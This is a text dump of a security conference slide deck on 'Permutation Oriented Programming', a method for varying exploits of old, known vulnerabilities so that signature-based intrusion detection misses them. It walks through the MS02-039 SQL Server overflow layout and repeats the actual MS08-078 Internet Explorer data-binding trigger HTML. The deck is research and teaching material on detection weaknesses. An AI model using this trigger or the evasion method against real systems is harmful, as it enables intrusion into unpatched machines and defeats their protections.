Semantic-Aware Code Model: Elevating the Future of Software Development
Semantic-Aware Code Model: Elevating the Future of Software DevelopmentSemantic-Aware Code Model: Elevating the Future of Software Development
Semantic-Aware Code Model: Elevating the Future of Software Development
 
BLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
BLOCKCHAIN TECHNOLOGY - Advantages and DisadvantagesBLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
BLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
 
Gen AI: Privacy Risks of Large Language Models (LLMs)
Gen AI: Privacy Risks of Large Language Models (LLMs)Gen AI: Privacy Risks of Large Language Models (LLMs)
Gen AI: Privacy Risks of Large Language Models (LLMs)
 

"ENG++: Permutation Oriented Programming" por Nelson Brito

  • 2. Agenda • 0000 – Once upon a time… • 0100 – Advanced • 0001 – Introduction • 0101 – Demonstration • 0010 – Brain at work • 0110 – Conclusions • 0011 – Approach • 0111 – Questions and Answers
  • 3. nbrito@pitbull:~$ whoami • Nelson Brito: • Computer/Network Security Researcher Enthusiast • Spare-time Security Researcher • Addict for systems’ (in)security • sekure SDI • Home town: • Rio de Janeiro • Public tools: • T50: an Experimental Mixed Packet Injector • Permutation Oriented Programming • ENG++ SQL Fingerprint™ • WEB: • http://about.me/nbrito
  • 5. Once upon a time…
  • 7. Before starting 0-Day Pattern-matching • 0-day is cool, isn’t it? But only if nobody is aware of its • This technology is as need today as it was in the past, existence. but the security solution cannot rely only on this. • Once the unknown vulnerability becomes known, the • No matter how fast is the pattern-matching 0-day will expire – since a patch or a mitigation is algorithm, if a pattern does not match, it means that released (which comes first). there is no vulnerability exploitation. • So we can conclude that, once expired (patched or • No vulnerability exploitation, no protection action… mitigated), 0-day has no more value. If you do not But what if the pattern is wrong? believe me, you can try to sell a well-known vulnerability to your vulnerability-broker. • How can we guarantee that the pattern, which did not match, is the correct approach for a protection • Some security solutions fight against 0-day faster action? Was the detection really designed to detect than the affected vendor. the vulnerability?
  • 8. Some concepts Exploitation Vulnerability • There are lots of good papers and books describing • Any vulnerability has a trigger, which leads the the exploitation techniques. Thus, I do recommend vulnerability to a possible and reasonable exploitation. you to look for them for a better understanding. • For some weakness types the vulnerability allows to • This lecture has no pretension of being a complete control the flow of software’s execution, executing reference for this topic. an arbitrary code (shellcode), such as: CWE-119, CWE- 120, CWV-134, CWE-190, CWE-196, CWE-367, etc. • The exploitation path described here is something that I decided to follow, and it helped me to • Before executing a shellcode, the exploitation must understand and apply POP (f.k.a. ENG++) to the deal with the vulnerable ecosystem (trigger, return vulnerabilities. address, etc…), performing memory manipulation on additional entities (such as: offset, register, • All the definitions are in compliance with: JUMP/CALL, stack, heap, memory alignment, memory padding, etc). – Common Vulnerabilities and Exposures. – Common Vulnerability Scoring System. – Common Weakness Enumeration.
  • 9. Current evasion techniques (a.k.a. TT) Techniques Tools • Packet fragmentation • Fragroute / Fragrouter / Sniffjoke • Stream segmentation • ADMutate / ALPHA[2-3] / BETA3 / Others • Byte and traffic insertion • Whisker / Nikto / Sandcat • Polymorphic shellcode • Snot / Stick / IDS-wakeup / Others • Denial of Service • Sidestep / RPC-evade-poc.pl / Others • URL obfuscation (+ SSL encryption) • Predator (AET) • RPC fragmentation • Etc… • HTML and JavaScript obfuscation • Etc…
  • 10. What is Permutation Oriented Programming? The scenario The technique • Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching day faster than the affected vendor”. technology, there are two options: – Easier: know how the vulnerability is detected • This protection (mitigation) has a long life, and (access to signature/vaccine). sometimes the correct protection (patch) is not – Harder: know deeply how to trigger the applied. vulnerability and how to exploit it (access to vulnerable ecosystem). • People’s hope, consequently their security strategy, resides on this security model: vulnerability mitigated, • Permutation Oriented Programming: no patch… – Deep analysis of a vulnerability, (re)searching for alternatives. • But what if an old and well-known vulnerability could – Use all the acquired knowledge and alternatives be exploited, even on this security approach model? to offer a variety of decision points (variants). – Intended to change the behavior of exploit • According to pattern-matching, any new variant of an developers. old vulnerability exploitation is considered a new – Use randomness to provide unpredictable vulnerability, because there is no pattern to be payloads, i.e., permutation. matched yet!
  • 11. What is Permutation Oriented Programming? The scenario The technique • Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching day faster than the affected vendor”. technology, there are two options: – Easier: know how the vulnerability is detected • This protection (mitigation) has a long life, and (access to signature/vaccine). sometimes the correct protection (patch) is not – Harder: know deeply how to trigger the applied. vulnerability and how to exploit it (access to vulnerable ecosystem). • People’s hope, consequently their security strategy, resides on this security model: vulnerability mitigated, • Permutation Oriented Programming: no patch… – Deep analysis of a vulnerability, (re)searching for alternatives. • But what if an old and well-known vulnerability could – Use all the acquired knowledge and alternatives be exploited, even on this security approach model? to offer a variety of decision points (variants). – Intended to change the behavior of exploit • According to pattern-matching, any new variant of an developers. old vulnerability exploitation is considered a new – Use randomness to provide unpredictable vulnerability, because there is no pattern to be payloads, i.e., permutation. matched yet!
  • 12. What is Permutation Oriented Programming? The scenario The technique • Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching day faster than the affected vendor”. technology, there are two options: – Easier: know how the vulnerability is detected • This protection (mitigation) has a long life, and (access to signature/vaccine). sometimes the correct protection (patch) is not – Easier: know deeply how to trigger the applied. vulnerability and how to exploit it (access to vulnerable ecosystem). • People’s hope, consequently their security strategy, resides on this security model: vulnerability mitigated, • Permutation Oriented Programming: no patch… – Deep analysis of a vulnerability, (re)searching for alternatives. • But what if an old and well-known vulnerability could – Use all the acquired knowledge and alternatives be exploited, even on this security approach model? to offer a variety of decision points (variants). – Intended to change the behavior of exploit • According to pattern-matching, any new variant of an developers. old vulnerability exploitation is considered a new – Use randomness to provide unpredictable vulnerability, because there is no pattern to be payloads, i.e., permutation. matched yet!
  • 13. POP (pronounced /pŏp/) technique The truth The examples • POP technique deals with vulnerable ecosystem and • Server-side vulnerabilities: memory manipulation, rather than shellcode – it is – MS02-039: CVE-2002-0649/CWE-120. neither a new polymorphic shellcode technique, nor – MS02-056: CVE-2002-1123/CWE-120. an obfuscation technique. • Client-side vulnerabilities: • POP technique can be applied to work with Rapid7 Metasploit Framework, CORE Impact Pro, Immunity – MS08-078: CVE-2008-4844/CWE-367. CANVAS Professional, and regular stand-alone – MS09-002: CVE-2009-0075/CWE-367. proof-of-concepts (freestyle coding). • Windows 32-bit shellcodes: • POP technique is neither an additional entropy for – 波動拳: “CMD /k”. tools mentioned above, nor an Advanced Evasion – 昇龍拳: “CMD /k set DIRCMD=/b”. Technique (AET). Instead, POP technique can empower both of them. • All example modules were ported to work with Rapid7 Metasploit Framework, but there are also • POP technique maintains the exploitation reliability, examples for client-side in HTML and JavaScript. even using random decisions, it is able to achieve all exploitation requirements.
  • 14. What if… exploit #1
  • 15. What if… exploit #1 exploit #2
  • 16. What if… exploit #1 exploit #N exploit #2
  • 17. What if… exploit #1 exploit #N exploit #2 shared zone
  • 18. What if… exploit #1 exploit #N exploit #2 shared zone
  • 19. What if… exploit #1 exploit #N exploit #2 shared zone Permutation Oriented Programming
  • 21. Vulnerabilities MS02-039 MS08-078 • Common Vulnerabilities and Exposures: • Common Vulnerabilities and Exposures: – CVE-2002-0649. – CVE-2008-4844. • Common Weakness Enumeration: • Common Weakness Enumeration: – CWE-120. – CWE-367. • CVSS Severity: 7.5 (HIGH). • CVSS Severity: 9.3 (HIGH). • Target: • Target: – Microsoft SQL Server 2000 SP0-2. – Microsoft Internet Explorer 5.01 SP4, 6 SP0-1, 7 and 8 Beta 2. • Vulnerable ecosystem: – Protocol UDP. • Vulnerable ecosystem: – Communication Port 1434. – DHTML with embedded Data binding. – SQL Request CLNT_UCAST_INST. – XML Data Source Object (DSO). – INSTANCENAME >= 96 bytes. – Data Consumer (HTML element) pointing to a – INSTANCENAME != NULL. dereferenced XML DSO.
  • 25. CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 26. memory manipulation vulnerability CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 27. memory manipulation vulnerability memory stack CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 28. memory manipulation vulnerability 0x04 request memory stack CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 29. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename memory stack CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 30. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 31. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 32. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return address additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 33. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump address padding additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 34. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 35. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 36. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 37. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 38. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 39. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 40. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 41. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 42. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 43. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 44. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 45. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return address jump padding writable address Trigger additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 46. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return address jump padding writable address Permutation additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 47. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding Exploitation overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 50. <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 51. memory manipulation vulnerability <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 52. memory manipulation vulnerability Internet Explorer (Data Consumers) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 53. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 54. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 55. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 56. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 57. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::CRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 58. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CCurrentRecordConsumer::Bind DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 59. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CCurrentRecordInstance::GetCurrentRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 60. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CXfer::CreateBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 61. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 62. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 63. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::AddBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 64. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CImplPtrAry::Append DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 65. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 66. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 67. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 68. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 69. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CRecordInstance::CRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 70. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CCurrentRecordConsumer::Bind DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 71. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CCurrentRecordInstance::GetCurrentRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 72. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CXfer::CreateBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 73. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 74. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 75. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CRecordInstance::AddBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 76. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CImplPtrAry::Append DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 77. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 78. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::TransferToDestination DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 79. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
